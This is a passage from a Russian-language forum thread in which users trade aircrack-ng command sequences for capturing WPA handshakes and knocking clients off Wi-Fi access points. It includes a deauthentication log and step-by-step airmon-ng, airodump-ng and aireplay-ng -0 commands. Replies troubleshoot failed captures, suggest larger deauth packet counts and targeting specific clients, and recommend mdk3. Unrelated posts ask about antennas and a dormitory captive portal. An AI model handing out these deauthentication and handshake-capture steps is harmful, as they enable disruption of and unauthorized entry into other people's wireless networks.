    20:27:21  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:21  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:23  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:24  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:26  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:28  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~#
     
    #666 snabgenech, 5 Nov 2015
    Last edited by a moderator: 6 Nov 2015
  7. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    Взял что было под рукой samsung 7262 ни разу на него не снимал, на камере флешка забита, ну вроде смысл то понятен.
     
  8. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    root@neo:~#airmon-ng
    root@neo:~#airmon-ng start wlan(x)
    root@neo:~#ifconfig ....................-смотришь свой адапте в режиме монитора
    root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) mon(x) ................................. -w - записывает хеш write, -с - канал
    root@neo:~#новый терминал
    root@neo:~#aireplay-ng -0 xxx -a xx:xx:xx:xx:xx mon(xxx) ........................-0 - и есть -- деавторизация --deauth, xxx - кол-во пакетов.
     
  9. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    а как это самое в windows сделать ?
     
  10. snabgenech

    snabgenech New Member

    Joined:
    26 Oct 2015
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Установлено kali linux 2.0
    где именно хеши сохраняются?
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В Windows этого никак не сделать, пока что. Windows очень многое ограничивает, в плане аппаратного доступа.
     
    AlexRU likes this.
  12. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    home folder
    ну то по умолчанию, а так куда укажешь... и не хэши, а cap файлы! :)
     
    snabgenech and binarymaster like this.
  13. qazzaq500

    qazzaq500 New Member

    Joined:
    30 Oct 2015
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Нужен свисток для тарелки от параболы 90 см. Линк держал как можно дальше! Просьба самодельные и дорогие не предлагать! Нужны готовые решение, в али их много но которую???
     
  14. snabgenech

    snabgenech New Member

    Joined:
    26 Oct 2015
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Утро доброе форумчане!
    Ранее уже писал что не могу поймать хейндшеки.
    Установлен kali linux 2.0
    Адаптер tp link 8200 nd
    root@neo:~#airmon-ng
    root@neo:~#iwconfig
    root@neo:~#ifconfig wlan1 down
    root@neo:~#iwconfig wlan1 mode monitor
    root@neo:~#ifconfig wlan1 up
    root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) wlan1
    root@neo:~#новый терминал
    root@neo:~#aireplay-ng -0 10 -a xx:xx:xx:xx:xx wlan1
    Файл под названием сохраняется,но в окне WPA хендшейк не появляется.
    Отключить клиента от точки также на получается, проверяю на своем роутере(подкл. телефон на андройде)
    уже в тупике,заранее спасибо.
     
    #674 snabgenech, 6 Nov 2015
    Last edited: 6 Nov 2015
  15. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    пробуй отправлять другое кол-во деаутентификационных пакетов

    aireplay-ng -0 100 -a xx:xx:xx:xx:xx wlan1 - например 100, можно больше...

    конкретизируй клиента сети

    aireplay-ng -0 100 -a xx:xx:xx:xx:xx -с yy:yy:yy:yy:yy:yy wlan1
     
  16. snabgenech

    snabgenech New Member

    Joined:
    26 Oct 2015
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Пробывал и 100 не вырубаю и все.
    Может не так что то делаю.
    Сегодня попробую.
    Спасибо
     
  17. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    Укажи конкретного клиента и сразу заметишь разницу!
    Ну и для начала, конечно, потренеруйся на...
    [​IMG]
     
    Andrey9999 likes this.
  18. UNIXTREID

    UNIXTREID Member

    Joined:
    2 Nov 2015
    Messages:
    140
    Likes Received:
    22
    Reputations:
    1
    Если честно, мне кажется, что mdk3 будет поэффективнее и не требует много движений для простой деаутентификации
     
  19. Black_Edition

    Black_Edition New Member

    Joined:
    6 Nov 2015
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Добрый день всем, мне нужна помощь, переехал в турцию, что бы учиться в вузе. Тек вот
    шас в обшаге. Тут вайфай, скорость норм 60=70 мб/с. Хотел просто посмотреть что такое Black Desert Новая игра...Упс вижу приложение ГамеНет не видит сети. Тоесть как буд-то интернета нет.
    Что делать. И да насчет ошибок, ноут куплен в турции а тут русской вкладки нет, приходиться по памяти
    Панель называеться
    Azora Captive Panel
    Кто что знает?

    _____________________________
    Попа в том что интернет есть, но именно клинет не видит
    Так же торент не видит сети
     
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Наверно сеть выходит через общий прокси сервер, поэтому другого интернета помимо HTTP нет.

    Это не решается одним ответом, нужно исследовать сеть.
     
    Black_Edition likes this.